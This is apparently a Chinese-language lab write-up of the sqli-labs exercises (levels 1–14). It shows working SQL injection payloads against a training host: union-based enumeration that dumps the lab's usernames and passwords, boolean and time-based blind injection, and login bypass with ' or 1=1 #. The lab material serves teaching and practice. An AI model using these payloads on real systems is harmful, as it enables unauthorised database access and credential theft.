sql-labs 1-14

less-1：

1.采用二分法进行猜列：

http://192.236.147.191:30000/Less-1/?id=1' order by 10--+

Welcome    Dhakkan

Unknown column '10' in 'order clause'

//出现错误

2........之后发现该数据只存在三列

http://192.236.147.191:30000/Less-1/?id=1' order by 3--+

Welcome    Dhakkan

Your Login name:Dumb

Your Password:Dumb

3........已知存在三列

采用http://192.236.147.191:30000/Less-1/?id=1' union select 1,2,3--+

//“union”联合的意思，把两次或多次查询结果合并起来

进行回显；发现句子正确数据却没有任何回显信息.......

Welcome    Dhakkan

Your Login name:Dumb

Your Password:Dumb

4.将id=1用“-”注释使“id=1”不被执行

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,3--+

此时发现用户名和密码显示为：

　　　　　　　　　　　　　　　　　　　　　　 Welcome    Dhakkan

Your Login name:2

Your Password:3

 

5.查库：

http://192.236.147.191:30000/Less-1/id=-1' union select 1,2, group_concat(schema_name) from information_schema.schemata--+

Welcome    Dhakkan

Your Login name:2

YourPassword:information_schema,challenges,mysql,performance_schema,security

 

6.查表--表于security：

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ //“security”转为16进制

Welcome    Dhakkan

Your Login name:2

Your Password:emails,referers,uagents,users

 

7.查列--列为users：

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+//“0x”转换十六进制及将“user”转换为16进制

Welcome    Dhakkan

Your Login name:2

Your Password:id,username,password

破解出该用户的“id”，“usernmae”，“password”

 

8.在“security”取出“username”数据：

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(username) from security.users--+

Welcome    Dhakkan

Your Login name:2

Your Password:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

 

9.在“security”取出“password”数据：

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(password) from security.users--+

Welcome    Dhakkan

Your Login name:2

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

 

10.同时在“security”取出“username”和“password”的数据：

http://192.236.147.191:30000/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users--+

Welcome    Dhakkan

Your Login name:2

Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

小结：

1 查库：select schema_name from information_schema.schemata

2 查表： select table_name from information_schema.tables where table_schema='security'

3 查列： select column_name from information_schema.columns where table_name='users'

5 查字段： select username,password from security.users

less-2：

 

步骤同上，把单引号“ ’ ”去除。

最后结果为：

Welcome    Dhakkan

Your Login name:2

Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

 

less-3：

 

在“less-1”的基础上 加上字符括号 “(”

及：“ -1') ”

 

less-4：

 

将“less-3”单引号“ ' ”改为双引号“ " ”

及：“ -1") ”

 

less-5:

盲注型

1、http://192.236.147.191:30000/Less-1/?id=1 回显的结果：

Welcome    Dhakkan

You are in...........

 

2、http://192.236.147.191:30000/Less-5/?id=1' 回显的结果：

Welcome    Dhakkan

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

 

3、查看有多少列:

http://192.236.147.191:30000/Less-5/?id=1' order by 3--+

Welcome    Dhakkan

You are in...........

此时正确返回为：“you are in..........”

 

4、(1)对当前数据库第一个字母进行不断猜解尝试:(题型不同不在是union selcet）

http://192.236.147.191:30000/Less-5/?id=1' and left((select database()),1)='s'--+

正确回显信息：

　　　　　　　　　　　　　　Welcome    Dhakkan

You are in...........

表明：猜想正确

猜解出第一位为“ s ”

(2)对当前数据库第二个字母进行不断猜解尝试:

?id=1' and left((select database()),2)='se'--+

————回显正确

猜解出第二位为“ e”

.......

（.）依次猜解可知数据库为“ security ”

 

此方法不不仅慢还不实用

此时运用web渗透的“瑞士军刀”： Burpsuite

视频详细：https://www.bilibili.com/video/BV1e441127Rd?p=11

运用“Burpsuite”可得数据库为：security

 

less-6:

与第五题一样把单引号换为双引号“ " ”

 

less-7：

运用中国菜刀

 

less-8：

法一：布尔盲注 和第六题一样

法二：

时间延迟盲注：

(1)：使用延迟的方法：

http://192.236.147.191:30000/Less-8/

?id=1' and sleep(5)--+

(2): 判断字符长度：

http://192.236.147.191:30000/Less-8/?id=1' and if (length(database())=8,1,sleep(5))--+

当数据库长度为8时数据加载很快，但不为8时加载很慢且延迟为5s左右。

 

 

less-9&less-10：

 

都是时间盲注

 

 

less-11：

Welcome   Dhakkan

Username :    

Password :    

 

1.寻找漏洞：

(1) 在输入admin、admin；显示登陆成功；

 

(2) 均在username输入“ ' ”出现：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1

说明“ ' ”存在漏洞

 

(3) 此时注释漏洞：“ admin' # ”

回显登陆成功：

Your Login name:admin

Your Password:admin

 

(4) 舍去admin输入“ ' # ”时出现错误

此时输入“ ' or 1=1 # ”回显登陆成功

 

2、查列：

（1）“ ' or 1=1 order by 2 # ” 回显成功只存在两列

 

（2）“ ' union select 1,2 # ” 回显：

Your Login name:1

Your Password:2

 

3、查库：

（1）“ ' union select 1, database() ”查当前数据库；回显：

Your Login name:1

Your Password:security

数据库为：security

 

（2）“ ' union select 1, group_concat(shcema_name) from information_schema.schemata # ” 查所有数据库：回显：

Your Login name:1

Your Password:information_schema,challenges,mysql,performance_schema,security

 

4、查表于security中：

（1）“ ' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' # ” 在 "security" 查所有表；回显：

Your Login name:1

Your Password:emails,referers,uagents,users

 

5、查列于users中：

“ ' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' # ” 查所有列；回显：

Your Login name:1

Your Password:id,username,password

 

 

6、取出“username” “paasord” 数据：

“ ' union select 1,group_concat(concat_ws('~',username,password)) from security.users # ” 回显：

Your Login name:1

Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

 

 

less-12 ：

") #

 

less-13:

 

ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #

 

1、经猜解漏洞为：“ ') # ”

 

2、查数据库

此题不同上题查询库是没有回显，因此采用布尔盲注；

（1） ') or if(length(database())>1,1,sleep(5)) # ——判断数据库长度是否大于1如果是短时间回显，如果不是睡眠5秒后回显；

此时回显成功

..........

') or if(length(database())=8,1,sleep(5)) # ———经猜解数据库长度为8；

 

（2）') or left(database(),1)='s' # ——回显成功，说明数据库首字母为s

第二位：') or left(database(),2)='se' # ——第二位为e；

..........

因此数据库为：“ security ”

 

3、查表

运用burp suite 暴力破解

https://www.bilibili.com/video/BV1yJ411g7hhp=7&spm_id_from=pageDriver

（1）

ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #

————information..

 

 

less-14:

1、漏洞为：admin'"

2、查库同上：

由burp suite 可查得数据库

 

3、查表：

（1） '" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a' # ——表为：uses

.........

 

4、查列：

'" or left((select column_name from information_schema.column where table_name='users' limit 0,1),1)='p' #